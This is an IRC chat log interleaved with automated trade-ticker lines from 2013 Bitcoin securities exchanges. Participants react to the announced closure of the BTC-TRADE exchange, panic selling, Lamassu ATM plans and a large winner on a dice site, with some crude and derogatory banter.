[BTC-TRADING-PT] 60 @ 0.18343333 = 11.006 BTC [+] {5} Sep 23 15:40:21 [BTCTC] [TAT.ASICMINER] 424 @ 0.01355011 = 5.7452 BTC [+] {6} Sep 23 15:40:52 involves a major shopping centre and a Lamassu machine or 2 ;) Sep 23 15:41:03 possibly more Sep 23 15:41:22 [BTCTC] [LABCOIN] 200 @ 0.001051 = 0.2102 BTC [-] Sep 23 15:41:29 aha Sep 23 15:41:51 but this btc thing is not a little everyday spenders thing Sep 23 15:42:23 [BTCTC] [TAT.ASICMINER] 200 @ 0.01236599 = 2.4732 BTC [-] {3} Sep 23 15:42:24 leotreasure: Australia is pretty big bro, I can only assume this does not involve Perth over here Sep 23 15:42:41 correct - currently I'm in Melbourne Sep 23 15:42:56 actually - sorry incorrect Sep 23 15:43:01 does involve Perth Sep 23 15:43:13 trying to cover all major cities Sep 23 15:43:19 only have 5 machines though Sep 23 15:43:24 [BTCTC] [LABCOIN] 950 @ 0.001101 = 1.046 BTC [+] {2} Sep 23 15:43:24 [BTCTC] [ASICMINER-PT] 1 @ 1.301 BTC [-] Sep 23 15:44:05 so far we will most likely have Sydney, Perth, Melbourne and Tas or Brisbane Sep 23 15:44:57 brisbane is pretty active i found Sep 23 15:45:12 havent met any tas bitcoiners yet Sep 23 15:45:26 [MPEX] [S.MG] 17200 @ 0.00018519 = 3.1853 BTC [-] {4} Sep 23 15:45:34 assbot: .-( Sep 23 15:46:23 leotreasure: Awesome! Sep 23 15:46:27 [BTCTC] [TAT.ASICMINER] 63 @ 0.01342 = 0.8455 BTC [-] Sep 23 15:46:47 leotreasure: Didn't think Lamassu had machines ready Sep 23 15:46:57 they're in the final process Sep 23 15:47:06 why can't burnside just give the source code of the site to someone? seems like such a waste otherwise Sep 23 15:47:28 [BTCTC] [TAT.ASICMINER] 677 @ 0.01322511 = 8.9534 BTC [-] {6} Sep 23 15:47:28 [BTCTC] [LABCOIN] 2000 @ 0.0013346 = 2.6692 BTC [+] {2} Sep 23 15:48:29 [BTCTC] [LABCOIN] 83 @ 0.00133206 = 0.1106 BTC [-] {2} Sep 23 15:48:29 [BTCTC] [FN] [DMS.SELLING] 100 @ 0.005061 = 0.5061 BTC [+] Sep 23 15:49:30 [BTCTC] [BTC-BOND] 236 @ 0.00900152 = 2.1244 BTC [+] {2} Sep 23 15:49:30 [BTCTC] [ASICMINER-PT] 1 @ 1.34 BTC [+] Sep 23 15:50:31 [BTCTC] [FN] [DMS.SELLING] 399 @ 0.00550248 = 2.1955 BTC [+] {2} Sep 23 15:50:31 [BTCTC] [ASICMINER-PT] 1 @ 1.352 BTC [+] Sep 23 15:51:00 do you guys know if any other exchanges are set to follow suit here? Sep 23 15:51:32 [BTCTC] [FN] [BTC-GROWTH] 1341 @ 0.073 = 97.893 BTC [-] {2} Sep 23 15:51:32 [BTCTC] [FN] [DMS.SELLING] 2250 @ 0.00501066 = 11.274 BTC [-] {2} Sep 23 15:51:32 [BTCTC] [ASICMINER-PT] 14 @ 1.29849998 = 18.179 BTC [-] {9} Sep 23 15:51:33 [BTCTC] [LABCOIN] 967 @ 0.00114734 = 1.1095 BTC [-] {5} Sep 23 15:52:33 [BTCTC] [BASIC-MINING] 61 @ 0.06416754 = 3.9142 BTC [-] {3} Sep 23 15:52:33 [BTCTC] [COGNITIVE] 3 @ 0.0934 = 0.2802 BTC [+] Sep 23 15:53:34 [BTCTC] [FN] [DMS.SELLING] 30 @ 0.00511 = 0.1533 BTC [+] Sep 23 15:53:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.01242066 = 0.1863 BTC [-] {2} Sep 23 15:53:34 [BTCTC] [COGNITIVE] 5 @ 0.0932 = 0.466 BTC [-] Sep 23 15:53:34 [BTCTC] [DMS.MINING] 3772 @ 0.00126056 = 4.7548 BTC [-] {7} Sep 23 15:53:50 this chan thought BF would be the first Sep 23 15:53:55 a few months ago Sep 23 15:53:59 or weeks(?) Sep 23 15:54:23 Havelock is pretty safe being in Canada and all though right? Sep 23 15:54:25 tat.asicminer frozen on btct Sep 23 15:54:35 [BTCTC] [BASIC-MINING] 6 @ 0.0842 = 0.5052 BTC [+] Sep 23 15:54:52 that's what i'm assuming Sep 23 15:55:09 Rulother: that's what I assumed Sep 23 15:55:15 yeah Sep 23 15:55:36 [BTCTC] [BASIC-MINING] 11 @ 0.08232363 = 0.9056 BTC [-] {3} Sep 23 15:55:36 [BTCTC] [LABCOIN] 66839 @ 0.00104628 = 69.9323 BTC [-] {20} Sep 23 15:55:37 [BTCTC] [DMS.MINING] 985 @ 0.0013081 = 1.2885 BTC [+] {2} Sep 23 15:55:57 I want to have some faith in mpex as well. this is just a bad omen here... Sep 23 15:56:17 Sorry MP, but I'm not paying 30btc to trade :P Sep 23 15:56:39 [BTCTC] [ASICMINER-PT] 6 @ 1.38783333 = 8.327 BTC [+] {4} Sep 23 15:56:39 [BTCTC] [DMS.MINING] 724 @ 0.001318 = 0.9542 BTC [+] Sep 23 15:56:39 [BTCTC] [LABCOIN] 4180 @ 0.00129981 = 5.4332 BTC [+] {3} Sep 23 15:57:00 CoinBr. Sep 23 15:58:39 [BTCTC] [FN] [DMS.SELLING] 50 @ 0.00511 = 0.2555 BTC [+] Sep 23 15:59:40 [BTCTC] [BTC-BOND] 98 @ 0.009 = 0.882 BTC [-] Sep 23 15:59:41 [BTCTC] [LABCOIN] 5000 @ 0.00126766 = 6.3383 BTC [-] {3} Sep 23 16:00:41 [BTCTC] [BASIC-MINING] 7 @ 0.08499 = 0.5949 BTC [+] {2} Sep 23 16:01:43 [BTCTC] [ASICMINER-PT] 9 @ 1.39711111 = 12.574 BTC [+] {4} Sep 23 16:01:43 [BTCTC] [LABCOIN] 938 @ 0.001095 = 1.0271 BTC [-] Sep 23 16:02:43 [BTCTC] [LABCOIN] 3820 @ 0.0010349 = 3.9533 BTC [-] {3} Sep 23 16:02:44 [BTCTC] [DMS.MINING] 536 @ 0.001319 = 0.707 BTC [+] Sep 23 16:02:44 [BTCTC] [FN] [DMS.SELLING] 722 @ 0.00514168 = 3.7123 BTC [+] {2} Sep 23 16:03:45 [BTCTC] [LABCOIN] 47612 @ 0.00101825 = 48.4809 BTC [-] {9} Sep 23 16:03:45 [BTCTC] [FN] [DMS.SELLING] 577 @ 0.00511559 = 2.9517 BTC [-] {2} Sep 23 16:03:45 [BTCTC] [ACTIVEMINING] 4430 @ 0.00157211 = 6.9644 BTC [+] {4} Sep 23 16:03:45 [BTCTC] [ASICMINER-PT] 6 @ 1.39883333 = 8.393 BTC [+] {2} Sep 23 16:04:46 [BTCTC] [FN] [BTC-GROWTH] 200 @ 0.073 = 14.6 BTC [-] Sep 23 16:04:46 [BTCTC] [LABCOIN] 400 @ 0.00104 = 0.416 BTC [+] Sep 23 16:05:46 [BTCTC] [ASICMINER-PT] 6 @ 1.326 = 7.956 BTC [-] {4} Sep 23 16:05:46 [BTCTC] [LABCOIN] 1283 @ 0.0012 = 1.5396 BTC [+] Sep 23 16:06:47 [BTCTC] [ASICMINER-PT] 1 @ 1.323 BTC [-] Sep 23 16:06:47 [BTCTC] [KENILWORTH] 1000 @ 0.00173675 = 1.7368 BTC [+] {4} Sep 23 16:08:49 [BTCTC] [ACTIVEMINING] 100 @ 0.001597 = 0.1597 BTC [+] Sep 23 16:08:49 [BTCTC] [ASICMINER-PT] 10 @ 1.4353 = 14.353 BTC [+] {6} Sep 23 16:08:50 [BTCTC] [LABCOIN] 392 @ 0.001185 = 0.4645 BTC [-] Sep 23 16:09:50 [BTCTC] [LABCOIN] 1263 @ 0.00114304 = 1.4437 BTC [-] {5} Sep 23 16:10:51 [BTCTC] [ASICMINER-PT] 2 @ 1.38 = 2.76 BTC [-] Sep 23 16:11:02 wts Single Sep 23 16:11:38 lol Sep 23 16:13:54 [BTCTC] [ASICMINER-PT] 2 @ 1.381 = 2.762 BTC [+] Sep 23 16:14:55 [BTCTC] [ASICMINER-PT] 1 @ 1.401 BTC [+] Sep 23 16:14:55 [BTCTC] [COGNITIVE] 2 @ 0.0952 = 0.1904 BTC [+] Sep 23 16:15:56 [BTCTC] [ASICMINER-PT] 1 @ 1.381 BTC [-] Sep 23 16:15:56 [BTCTC] [COGNITIVE] 3 @ 0.0952 = 0.2856 BTC [+] Sep 23 16:15:56 [BTCTC] [LABCOIN] 7867 @ 0.00108852 = 8.5634 BTC [-] {8} Sep 23 16:16:57 [BTCTC] [ASICMINER-PT] 1 @ 1.442 BTC [+] Sep 23 16:17:58 [HAVELOCK] [AM100] 13 @ 0.0157 = 0.2041 BTC [+] Sep 23 16:18:59 [BTCTC] [LABCOIN] 190 @ 0.001051 = 0.1997 BTC [-] Sep 23 16:19:27 shouldnt There Will Be Blood be closed? Sep 23 16:20:00 [BTCTC] [ACTIVEMINING] 100 @ 0.001448 = 0.1448 BTC [+] Sep 23 16:20:00 [BTCTC] [FN] [BTC-GROWTH] 19 @ 0.0759 = 1.4421 BTC [+] Sep 23 16:20:05 kakobrekla ^^^ Sep 23 16:21:01 [BTCTC] [BASIC-MINING] 3 @ 0.06521 = 0.1956 BTC [-] {2} Sep 23 16:21:01 [BTCTC] [ACTIVEMINING] 800 @ 0.00143505 = 1.148 BTC [-] {6} Sep 23 16:21:09 i dont do that. Sep 23 16:21:55 word Sep 23 16:22:10 mircea_popescu ? Sep 23 16:22:27 talk to him yea Sep 23 16:23:03 [BTCTC] [LABCOIN] 200 @ 0.001055 = 0.211 BTC [-] Sep 23 16:23:48 15b and so many discounts to choose from... what to buy what to buy.. Sep 23 16:24:04 [BTCTC] [B] [CIPHERMINE.B1] 99 @ 0.00103 = 0.102 BTC [-] Sep 23 16:24:23 is btc-bond traded on any other exchanges? I haven't seen it anywhere else, so I'm assuming the answer is no Sep 23 16:25:05 [BTCTC] [LABCOIN] 1000 @ 0.001054 = 1.054 BTC [-] Sep 23 16:25:05 [BTCTC] [ACTIVEMINING] 305 @ 0.0014282 = 0.4356 BTC [-] {2} Sep 23 16:26:42 [\\\]: are you candoo? Sep 23 16:26:42 [\\\]: pls give me my coinz back Sep 23 16:26:42 https://bitcointalk.org/index.php?topic=292170.0 Sep 23 16:26:48 Free cloud-based stratum proxy for Slush & BTCGuild (beta) Sep 23 16:27:07 [BTCTC] [FN] [DMS.SELLING] 499 @ 0.005108 = 2.5489 BTC [-] Sep 23 16:27:07 [BTCTC] [ASICMINER-PT] 1 @ 1.447 BTC [+] Sep 23 16:27:07 [BTCTC] [LABCOIN] 502 @ 0.00105399 = 0.5291 BTC [-] {2} Sep 23 16:28:08 [BTCTC] [ACTIVEMINING] 217 @ 0.00142292 = 0.3088 BTC [-] {2} Sep 23 16:28:08 [BTCTC] [BTC-TRADING-PT] 4 @ 0.0402 = 0.1608 BTC [-] Sep 23 16:28:09 [BTCTC] [BITVPS] 243 @ 0.00100004 = 0.243 BTC [+] {2} Sep 23 16:28:15 ouch lol btc-trading-pt .04 Sep 23 16:28:43 gotta love the free market Sep 23 16:29:09 [BTCTC] [ACTIVEMINING] 278 @ 0.00140339 = 0.3901 BTC [-] {2} Sep 23 16:29:10 [BTCTC] [LABCOIN] 3281 @ 0.00105039 = 3.4463 BTC [-] {4} Sep 23 16:29:10 [BTCTC] [COGNITIVE] 1 @ 0.1007 BTC [+] Sep 23 16:29:23 i actually feel bad for the people panicking and/or losing money :/ Sep 23 16:30:10 [BTCTC] [LABCOIN] 25425 @ 0.00104833 = 26.6538 BTC [-] {6} Sep 23 16:30:11 [BTCTC] [DMS.MINING] 235 @ 0.00137148 = 0.3223 BTC [+] {2} Sep 23 16:30:15 it's hard to see your assets lose so much value and not panic Sep 23 16:30:27 i feel good Sep 23 16:30:30 when noobs lose money Sep 23 16:31:00 does it fall under the blood bitbet bet? Sep 23 16:31:11 [BTCTC] [ASICMINER-PT] 10 @ 1.3943 = 13.943 BTC [-] {3} Sep 23 16:31:12 [BTCTC] [BITVPS] 274 @ 0.001 = 0.274 BTC [-] Sep 23 16:31:12 [BTCTC] [LABCOIN] 934 @ 0.00104112 = 0.9724 BTC [-] {3} Sep 23 16:31:13 definately Sep 23 16:31:25 even if he's selling it and it doesn't close Sep 23 16:31:38 yes, bet says November 17th, 2012 for BTCT Sep 23 16:31:39 it says it is closing Sep 23 16:31:41 not selling Sep 23 16:32:05 you owe me 1btc thickasthieves Sep 23 16:32:43 JD at -2k Sep 23 16:32:46 oh man Sep 23 16:33:14 [HAVELOCK] [AM1] 1 @ 1.50612 BTC [+] Sep 23 16:33:15 [HAVELOCK] [AM100] 17 @ 0.01513529 = 0.2573 BTC [-] {3} Sep 23 16:33:17 [MPEX] [S.MPOE] 1700 @ 0.00092919 = 1.5796 BTC [+] Sep 23 16:33:17 the day the music died Sep 23 16:33:24 ^ Sep 23 16:33:37 I owe you shit Sep 23 16:33:51 first, you never accepted the bet Sep 23 16:34:15 [BTCTC] [LABCOIN] 1016 @ 0.00102 = 1.0363 BTC [-] {2} Sep 23 16:34:15 [BTCTC] [S.BBET-PT] 1008 @ 0.00010079 = 0.1016 BTC [-] {2} Sep 23 16:34:17 lol ya i did Sep 23 16:34:21 !ticker btct ASICMINER-PT Sep 23 16:34:25 [BTCT:ASICMINER-PT] 1D: 1 / 1.37785 / 1.699 (1057 shares, 1456.4 BTC), 7D: 1 / 1.66774 / 2.104 (2902 shares, 4842.9 BTC), 30D: 1 / 2.30435 / 3.197 (13694 shares, 31555.7 BTC) Sep 23 16:34:26 and asicminer priced touched on 1btc Sep 23 16:34:37 if you look at btct chart Sep 23 16:35:16 second, i also never accepted the bet Sep 23 16:35:16 [BTCTC] [LABCOIN] 16061 @ 0.00102002 = 16.3825 BTC [+] {6} Sep 23 16:35:24 i gave you warning about the bet Sep 23 16:35:27 then you dropped it Sep 23 16:35:35 no Sep 23 16:35:53 third, did it even touch 1? Sep 23 16:35:56 i'm not really seriously about it Sep 23 16:36:06 yeah i think so according to btct chart Sep 23 16:36:17 [BTCTC] [LABCOIN] 3000 @ 0.001043 = 3.129 BTC [+] Sep 23 16:36:17 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [+] Sep 23 16:37:19 [HAVELOCK] [CBTC] 914 @ 0.00039965 = 0.3653 BTC [-] Sep 23 16:37:20 [BTCTC] [S.MPOE-PT] 1000 @ 0.000112 = 0.112 BTC [-] Sep 23 16:37:20 [BTCTC] [LABCOIN] 850 @ 0.001044 = 0.8874 BTC [+] Sep 23 16:37:21 [BTCTC] [ASICMINER-PT] 2 @ 1.3975 = 2.795 BTC [-] {2} Sep 23 16:37:40 am @ 1 was touched very shortly after trading was started again Sep 23 16:38:19 [BTCTC] [BTC-TRADING-PT] 10 @ 0.0402 = 0.402 BTC [-] {2} Sep 23 16:38:34 yeah nice Sep 23 16:38:41 technicially i won that bet :) Sep 23 16:39:20 [BTCTC] [LABCOIN] 1379 @ 0.00104416 = 1.4399 BTC [-] {2} Sep 23 16:39:20 [BTCTC] [FN] [BTC-GROWTH] 181 @ 0.07440828 = 13.4679 BTC [-] {2} Sep 23 16:39:37 oh 1.05 apparently lol Sep 23 16:39:51 see pm Sep 23 16:40:20 [BTCTC] [LABCOIN] 3142 @ 0.001084 = 3.4059 BTC [+] Sep 23 16:40:20 [BTCTC] [FN] [BTC-GROWTH] 280 @ 0.073 = 20.44 BTC [-] Sep 23 16:41:21 [BTCTC] [ASICMINER-PT] 1 @ 1.395 BTC [-] Sep 23 16:41:21 [BTCTC] [LABCOIN] 265 @ 0.001084 = 0.2873 BTC [+] {2} Sep 23 16:41:36 you ain't gotta like it but the hood gone love it! Sep 23 16:43:23 [BTCTC] [ASICMINER-PT] 7 @ 1.44528571 = 10.117 BTC [+] {2} Sep 23 16:43:47 time to hire TATI-PR Sep 23 16:44:24 [BTCTC] [ASICMINER-PT] 2 @ 1.42 = 2.84 BTC [-] {2} Sep 23 16:44:24 [BTCTC] [LABCOIN] 1522 @ 0.00108718 = 1.6547 BTC [+] {3} Sep 23 16:44:25 just have to find a double D girl with a triple digit IQ Sep 23 16:45:00 so she can do what? Sep 23 16:45:12 that should be as easy as finding a bitcoin security that isn't a scam Sep 23 16:45:25 [BTCTC] [LABCOIN] 4159 @ 0.00111657 = 4.6438 BTC [+] {6} Sep 23 16:45:26 IQ OVER 100! Sep 23 16:46:13 ThickAsThieves: I wasn't insinuating anything :p Sep 23 16:46:27 [BTCTC] [RSM] 65 @ 0.004489 = 0.2918 BTC [+] Sep 23 16:47:51 https://forum.litecoin.net/index.php/topic,4582.msg46464.html#msg46464 Sep 23 16:47:51 sorry, i'm on edge today, Sep 23 16:47:54 LMFAO Sep 23 16:47:59 >c) Create a new exchange (can't go into details right now but this is a possibility) Sep 23 16:48:01 [LTC-GLOBAL] CIPHERMINE Industrial Cryptocoin Mining & High Perf. Computing Sep 23 16:48:15 even though we decided a coiple days ago that BTCT was def closing, and started planning, Sep 23 16:48:25 my day is already jampacked Sep 23 16:48:34 and tomorrow I leave the country for 9 days Sep 23 16:48:44 so burnside's timing is awesome Sep 23 16:48:54 kakobrekla: apt-get install php5, vim exchange.php Sep 23 16:48:56 DONE Sep 23 16:49:02 lolz Sep 23 16:49:17 Kate is also advising people to sell at a loss Sep 23 16:49:19 funny shit Sep 23 16:49:25 scammy bitch Sep 23 16:49:29 [BTCTC] [ACTIVEMINING] 184 @ 0.001414 = 0.2602 BTC [-] Sep 23 16:49:34 Yea so scammy Sep 23 16:49:45 she only said it to "small investors" Sep 23 16:49:55 as in, anyone that isnt her Sep 23 16:50:06 STOP THE SLANDER YOU HEAR Sep 23 16:50:08 lol Sep 23 16:50:10 haha Sep 23 16:50:16 its funny because shes not even a woman Sep 23 16:50:27 scamming guys at nightclubs Sep 23 16:50:39 well i have nothing against sexchangers, i honestly have no exposure to them Sep 23 16:50:41 may as well invest in chelsea manning Sep 23 16:51:32 [BTCTC] [ACTIVEMINING] 1250 @ 0.0014042 = 1.7553 BTC [-] {2} Sep 23 16:52:16 friedcat-style Sep 23 16:52:33 [BTCTC] [ACTIVEMINING] 3847 @ 0.001402 = 5.3935 BTC [-] Sep 23 16:52:33 [BTCTC] [ASICMINER-PT] 5 @ 1.399 = 6.995 BTC [-] {2} Sep 23 16:54:35 [BTCTC] [LABCOIN] 2100 @ 0.00117395 = 2.4653 BTC [+] {3} Sep 23 16:55:36 [BTCTC] [ASICMINER-PT] 4 @ 1.438 = 5.752 BTC [+] Sep 23 16:55:37 [BTCTC] [LABCOIN] 900 @ 0.00117394 = 1.0565 BTC [-] {3} Sep 23 16:56:37 [BTCTC] [LABCOIN] 673 @ 0.00117514 = 0.7909 BTC [+] {2} Sep 23 16:56:51 what is all dis justdice drama Sep 23 16:57:38 [BTCTC] [LABCOIN] 6039 @ 0.00118226 = 7.1397 BTC [+] {6} Sep 23 16:57:50 jcpham: retards who dont understand statistics Sep 23 16:58:39 [BTCTC] [LABCOIN] 2484 @ 0.00120145 = 2.9844 BTC [+] {5} Sep 23 16:59:40 [BTCTC] [LABCOIN] 3416 @ 0.00124892 = 4.2663 BTC [+] {3} Sep 23 16:59:41 [BTCTC] [ASICMINER-PT] 2 @ 1.395 = 2.79 BTC [-] {2} Sep 23 17:00:41 [BTCTC] [LABCOIN] 900 @ 0.00110495 = 0.9945 BTC [-] {3} Sep 23 17:01:42 [BTCTC] [LABCOIN] 392 @ 0.001247 = 0.4888 BTC [+] Sep 23 17:01:42 [BTCTC] [ASICMINER-PT] 3 @ 1.39433333 = 4.183 BTC [-] {2} Sep 23 17:02:42 [BTCTC] [ACTIVEMINING] 174 @ 0.00142611 = 0.2481 BTC [-] {2} Sep 23 17:02:42 [BTCTC] [ASICMINER-PT] 1 @ 1.395 BTC [+] Sep 23 17:03:43 [BTCTC] [LABCOIN] 1114 @ 0.00123896 = 1.3802 BTC [-] {5} Sep 23 17:06:46 [BTCTC] [LABCOIN] 8963 @ 0.00124379 = 11.1481 BTC [+] {15} Sep 23 17:06:46 [BTCTC] [ACTIVEMINING] 1423 @ 0.00148952 = 2.1196 BTC [+] {4} Sep 23 17:07:47 [BTCTC] [LABCOIN] 1108 @ 0.001251 = 1.3861 BTC [+] {2} Sep 23 17:08:48 [BTCTC] [LABCOIN] 101 @ 0.00125108 = 0.1264 BTC [+] {2} Sep 23 17:10:50 [BTCTC] [LABCOIN] 165 @ 0.001234 = 0.2036 BTC [-] Sep 23 17:11:51 [BTCTC] [LABCOIN] 150 @ 0.001235 = 0.1853 BTC [+] Sep 23 17:11:51 [MPEX] [S.MPOE] 2748 @ 0.00092851 = 2.5515 BTC [-] Sep 23 17:11:52 [BTCTC] [ACTIVEMINING] 125 @ 0.001492 = 0.1865 BTC [+] Sep 23 17:12:52 [BTCTC] [LABCOIN] 752 @ 0.00123414 = 0.9281 BTC [-] {2} Sep 23 17:13:54 [BTCTC] [ACTIVEMINING] 445 @ 0.001492 = 0.6639 BTC [+] Sep 23 17:14:55 [BTCTC] [BASIC-MINING] 2 @ 0.0665 = 0.133 BTC [-] Sep 23 17:14:55 [BTCTC] [LABCOIN] 7208 @ 0.00128497 = 9.2621 BTC [-] {8} Sep 23 17:14:55 [BTCTC] [ACTIVEMINING] 700 @ 0.00148942 = 1.0426 BTC [-] {2} Sep 23 17:14:55 [BTCTC] [COGNITIVE] 1 @ 0.1008 BTC [+] Sep 23 17:16:57 [BTCTC] [LABCOIN] 6013 @ 0.00125518 = 7.5474 BTC [-] {5} Sep 23 17:16:57 [BTCTC] [ACTIVEMINING] 697 @ 0.00148947 = 1.0382 BTC [+] {3} Sep 23 17:16:57 [MPEX] [S.MPOE] 8250 @ 0.00092821 = 7.6577 BTC [-] {2} Sep 23 17:17:58 [BTCTC] [COGNITIVE] 3 @ 0.1008 = 0.3024 BTC [+] {3} Sep 23 17:17:58 [BTCTC] [ASICMINER-PT] 10 @ 1.39259999 = 13.926 BTC [-] {5} Sep 23 17:18:59 [BTCTC] [ACTIVEMINING] 1813 @ 0.00148843 = 2.6985 BTC [-] {3} Sep 23 17:18:59 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.07352 = 3.676 BTC [+] {2} Sep 23 17:18:59 [BTCTC] [LABCOIN] 501 @ 0.00116623 = 0.5843 BTC [-] {4} Sep 23 17:19:40 !t bt labcoin Sep 23 17:19:41 [BTCT:LABCOIN] 1D: 0.00025 / 0.0013 / 0.0027 (1440593 shares, 1877.7 BTC), 7D: 0.00025 / 0.00184 / 0.003 (5335268 shares, 9800.8 BTC), 30D: 0.00025 / 0.00265 / 0.003989 (14350104 shares, 37998.3 BTC) Sep 23 17:20:00 [BTCTC] [ACTIVEMINING] 1648 @ 0.001489 = 2.4539 BTC [+] Sep 23 17:20:00 [BTCTC] [ASICMINER-PT] 2 @ 1.381 = 2.762 BTC [-] Sep 23 17:20:02 .00025 Sep 23 17:20:03 lol Sep 23 17:20:13 amazing company Sep 23 17:20:13 AMAZING COMPANY! Sep 23 17:20:28 amazing trade. Sep 23 17:20:29 AMAZING COMPANY! Sep 23 17:20:51 GO LABCOIN! Sep 23 17:21:01 [BTCTC] [ACTIVEMINING] 4372 @ 0.00159507 = 6.9736 BTC [+] {11} Sep 23 17:21:01 [BTCTC] [ASICMINER-PT] 4 @ 1.38 = 5.52 BTC [-] Sep 23 17:21:01 [BTCTC] [FN] [BTC-GROWTH] 15 @ 0.07352 = 1.1028 BTC [+] Sep 23 17:21:01 [BTCTC] [LABCOIN] 10000 @ 0.00129089 = 12.9089 BTC [+] {8} Sep 23 17:21:14 I LOVE YOU GUYS Sep 23 17:21:25 ME TOO Sep 23 17:21:27 Supposedly the .00025 wa sa typo? Sep 23 17:21:28 LET'S SEE SOME ACTIVEMINING PICS NOW Sep 23 17:21:33 someone with fat fingers Sep 23 17:21:41 he posted on the forum saying he messed up and lost 10 btc Sep 23 17:21:59 I'm guessing after the book was cleared lol Sep 23 17:22:02 [BTCTC] [ACTIVEMINING] 140 @ 0.001673 = 0.2342 BTC [+] Sep 23 17:22:04 yeah Sep 23 17:22:31 Im kinda bummed the book got cleared Sep 23 17:22:48 had many low bids I wish weak hands wouldve dumped into Sep 23 17:24:03 What a fucking panic Sep 23 17:24:04 [BTCTC] [LABCOIN] 889 @ 0.001293 = 1.1495 BTC [+] Sep 23 17:24:20 I can't wait to see "Ok guys, I worked something out we'll be ok." Sep 23 17:24:35 If I see that I'll agree with MP that burnside is nothing but a scammer Sep 23 17:25:05 [BTCTC] [ASICMINER-PT] 3 @ 1.41533333 = 4.246 BTC [+] {3} Sep 23 17:25:05 [BTCTC] [LABCOIN] 3000 @ 0.00115817 = 3.4745 BTC [-] {5} Sep 23 17:25:05 [BTCTC] [FN] [DMS.SELLING] 791 @ 0.00550837 = 4.3571 BTC [+] {2} Sep 23 17:26:04 Burnside seemed sketched when everyone panicked over the earlier SEC scare this summer, I think this is the end. Sep 23 17:26:33 He couldve gone about this better, possibly freezing all trading for 24 hours to avoid so much panic Sep 23 17:27:04 yes. some people, such as me, were sleeping when all this happened. Sep 23 17:27:07 [BTCTC] [LABCOIN] 1003 @ 0.00129304 = 1.2969 BTC [+] {4} Sep 23 17:27:07 [BTCTC] [DMS.MINING] 3037 @ 0.00134289 = 4.0784 BTC [-] {8} Sep 23 17:27:07 [BTCTC] [B] [CIPHERMINE.B1] 111 @ 0.001105 = 0.1227 BTC [+] Sep 23 17:27:15 saulimus, same Sep 23 17:27:35 3am est, what the hell isn't he on the east coast? Sep 23 17:28:09 [BTCTC] [DMS.MINING] 301 @ 0.001581 = 0.4759 BTC [+] Sep 23 17:28:20 somethign seirously fucked up going on at just-dice.com.... nakowa has won over 12,000 BTC now Sep 23 17:28:29 woohoo Sep 23 17:28:31 the f Sep 23 17:28:36 Error in their random value calcualtion? Sep 23 17:28:38 dooglus gonna be pissed Sep 23 17:28:41 ?? Sep 23 17:28:47 he took profit from 7000 BTC to -2500 in 2-3 days Sep 23 17:29:09 [BTCTC] [LABCOIN] 2800 @ 0.00129398 = 3.6231 BTC [+] {6} Sep 23 17:29:09 [BTCTC] [FN] [DMS.SELLING] 144 @ 0.00550611 = 0.7929 BTC [-] {3} Sep 23 17:29:09 [BTCTC] [PAJKA.BOND] 97 @ 0.0053 = 0.5141 BTC [+] Sep 23 17:29:25 one guy literally winning $1.5 million in 2 days Sep 23 17:29:27 well, atleast he's got balls... Sep 23 17:29:39 either he hacked the server seed, or is the luckeist mf on the planet Sep 23 17:30:10 [BTCTC] [ACTIVEMINING] 788 @ 0.00144902 = 1.1418 BTC [-] {3} Sep 23 17:31:01 http://www.reddit.com/r/AMA/comments/1my8fc/im_the_whale_on_justdice_id_love_to_answer/ but he isn't saying anything concrete Sep 23 17:31:11 [BTCTC] [FN] [DMS.SELLING] 418 @ 0.00552351 = 2.3088 BTC [+] {4} Sep 23 17:31:59 heh, yeah. an AMA where he doesn't reveal anything isn't really an AMA at all Sep 23 17:32:12 matuszed: nop, if HMAC_SHA512 had any bias then it would be thrown out the fucking window Sep 23 17:32:12 [BTCTC] [ASICMINER-PT] 4 @ 1.4 = 5.6 BTC [-] Sep 23 17:32:43 hash functions are rigorously tested for uniformity Sep 23 17:32:58 its just insane to see the destruction going on for investors over there Sep 23 17:33:00 insane. Sep 23 17:33:02 Strange how that scam accusation comes up about server seeds then the whale(s) keep on winning Sep 23 17:33:13 [BTCTC] [DMS.MINING] 145 @ 0.001254 = 0.1818 BTC [-] {2} Sep 23 17:34:14 [BTCTC] [FN] [DMS.SELLING] 50 @ 0.00567 = 0.2835 BTC [+] Sep 23 17:34:14 [BTCTC] [ASICMINER-PT] 21 @ 1.4 = 29.4 BTC [-] Sep 23 17:34:15 yes, whales losing money all the time is fine :) Sep 23 17:34:15 [BTCTC] [DMS.MINING] 503 @ 0.00125108 = 0.6293 BTC [-] {2} Sep 23 17:35:15 [MPEX] [S.MPOE] 4000 @ 0.00092919 = 3.7168 BTC [+] Sep 23 17:35:15 [BTCTC] [LABCOIN] 225 @ 0.001194 = 0.2687 BTC [-] {2} Sep 23 17:37:17 [BTCTC] [ASICMINER-PT] 38 @ 1.35460524 = 51.475 BTC [-] {9} Sep 23 17:37:18 [BTCTC] [LABCOIN] 2000 @ 0.00118608 = 2.3722 BTC [-] {5} Sep 23 17:38:17 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Sep 23 17:39:18 [BTCTC] [FN] [DMS.SELLING] 395 @ 0.00546579 = 2.159 BTC [-] {3} Sep 23 17:39:58 I'm curious why burnside didn't locate the business, servers, site and everything in Panama and tell anyone who threatened legal action to GFY Sep 23 17:41:15 it's already listed in Belize Sep 23 17:41:20 [BTCTC] [ACTIVEMINING] 1070 @ 0.00165424 = 1.77 BTC [-] {6} Sep 23 17:41:47 did we have another glbse Sep 23 17:41:50 incident? Sep 23 17:42:07 btctctcttc is the new glbse Sep 23 17:43:15 btctc has been glbse'd. Sep 23 17:43:23 [MPEX] [S.MPOE] 10813 @ 0.00092314 = 9.9819 BTC [-] {4} Sep 23 17:43:24 i just read the announcement Sep 23 17:43:27 shoulda mcafeed Sep 23 17:43:49 mircea_popescu is elated to be so correct, I'm sure Sep 23 17:44:05 yeah he nailed it Sep 23 17:44:15 Glad I didn't cross-list on BTCT Sep 23 17:44:24 Any ideas on why they're shutting down? Sep 23 17:44:26 nailed it, again, god damn. Sep 23 17:45:10 burnside has been iffy with legal stuff for quite awhile.. i thought he wouldve sold the site tho Sep 23 17:45:25 [BTCTC] [ASICMINER-PT] 3 @ 1.32766666 = 3.983 BTC [+] {2} Sep 23 17:45:25 [BTCTC] [FN] [BTC-GROWTH] 2 @ 0.0807 = 0.1614 BTC [+] Sep 23 17:45:26 Burnside's lawyers are basically telling him to shut it down Sep 23 17:46:27 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.0808 = 0.808 BTC [+] Sep 23 